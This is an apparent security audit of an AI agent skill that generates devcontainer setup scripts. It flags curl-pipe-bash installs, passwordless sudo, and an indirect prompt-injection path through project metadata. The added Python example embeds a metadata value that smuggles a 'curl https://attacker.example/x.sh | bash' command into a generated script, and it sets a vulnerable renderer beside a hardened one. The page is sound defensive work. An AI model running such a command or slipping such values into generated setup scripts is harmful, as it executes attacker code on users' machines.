setting-up-devcontainers
Warn
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: MEDIUM
Categories: EXTERNAL_DOWNLOADS, REMOTE_CODE_EXECUTION, COMMAND_EXECUTION, PROMPT_INJECTION
Full Analysis
- [REMOTE_CODE_EXECUTION] (MEDIUM): The skill's references recommend installing software with the curl | bash pattern from domains such as claude.ai and get.volta.sh. While common for these tools, executing unverified remote scripts with shell privileges is a high-risk pattern: whatever the server returns at install time runs as-is. Severity is adjusted because the pattern aligns with the skill's primary setup purpose.
- [COMMAND_EXECUTION] (MEDIUM): The generated Dockerfile templates grant the container user passwordless sudo (NOPASSWD:ALL). This is common devcontainer practice, but it means any compromised tool or script inside the environment can escalate to root in the container.
- [PROMPT_INJECTION] (LOW): Indirect prompt-injection surface: the skill reads a project-supplied marketplace.json file to generate setup scripts. Malicious content in that file could inject shell commands into the generated post-create.sh script through unvalidated placeholders. Evidence chain: ingestion: marketplace.json; boundary markers: none identified in templates; capability inventory: shell-script generation and execution; sanitization: no sanitization logic found for project-provided metadata placeholders.
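The prompt-injection finding describes the path abstractly. The following Python is an added example written for this page, not code from the audited skill or from Gen Agent Trust Hub. It assumes a {{name}}-style placeholder template and a constructed marketplace.json (both hypothetical), and shows a naive substitution that lets a metadata field become shell commands in post-create.sh, beside a render that allowlists each value against a per-field pattern and shell-quotes it before substitution.

```python
"""Generating post-create.sh from project metadata without letting the
metadata become shell code.

Added example for this audit page. The template, the placeholder syntax and
the marketplace.json content below are constructed assumptions, not the
audited skill's own files.
"""
import json
import re
import shlex

# Constructed marketplace.json: the description carries a shell payload.
MARKETPLACE_JSON = json.dumps({
    "name": "acme-tools",
    "node_version": "20.11.1",
    "description": "demo; curl https://attacker.example/x.sh | bash #",
})

# Hypothetical template. Values are bound to variables so that a
# shell-quoted value is always a single word on the right of '='.
TEMPLATE = """#!/usr/bin/env bash
set -euo pipefail
PROJECT_NAME={{name}}
PROJECT_DESC={{description}}
NODE_VERSION={{node_version}}
echo "Setting up ${PROJECT_NAME}: ${PROJECT_DESC}"
volta install "node@${NODE_VERSION}"
"""

PLACEHOLDER = re.compile(r"\{\{(\w+)\}\}")

# Allowlist: each placeholder names the only shape its value may take.
ALLOWED = {
    "name": re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,63}"),
    "node_version": re.compile(r"\d+\.\d+\.\d+"),
    "description": re.compile(r"[A-Za-z0-9 .,_-]{0,120}"),
}


def load_metadata(text):
    """Parse marketplace.json and insist on a flat JSON object."""
    data = json.loads(text)
    if not isinstance(data, dict):
        raise ValueError("marketplace.json must be a JSON object")
    return data


def render_naive(template, metadata):
    """Vulnerable: values are substituted verbatim, so a metadata field
    that contains ';' or '|' becomes additional shell commands."""
    return PLACEHOLDER.sub(lambda m: str(metadata[m.group(1)]), template)


def render_safe(template, metadata):
    """Hardened: reject unknown placeholders, require each value to match
    its allowlist pattern, then shell-quote it (shlex.quote) so even an
    allowed value with spaces stays a single argument."""
    def substitute(match):
        key = match.group(1)
        if key not in ALLOWED:
            raise ValueError(f"unknown placeholder: {key}")
        value = str(metadata.get(key, ""))
        if not ALLOWED[key].fullmatch(value):
            raise ValueError(f"rejected value for {key}: {value!r}")
        return shlex.quote(value)
    return PLACEHOLDER.sub(substitute, template)


def injected_line(script):
    """Return the first line of a rendered script that pipes into bash,
    or None. Used to show that the naive render produced executable
    attacker content."""
    for line in script.splitlines():
        if "| bash" in line:
            return line
    return None


if __name__ == "__main__":
    meta = load_metadata(MARKETPLACE_JSON)
    print("naive render injects:", injected_line(render_naive(TEMPLATE, meta)))
    try:
        render_safe(TEMPLATE, meta)
    except ValueError as err:
        print("safe render refused:", err)
    benign = dict(meta, description="demo project")
    print(render_safe(TEMPLATE, benign))
```

The naive render turns the description into `PROJECT_DESC=demo; curl https://attacker.example/x.sh | bash #`, which the container executes during post-create. The safe render refuses that value outright; with a benign description it emits `PROJECT_DESC='demo project'`. Quoting alone would also neutralise the payload here, but the allowlist is what keeps the generated script auditable when the template later grows a placeholder that is not bound to a variable.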
Audit Metadata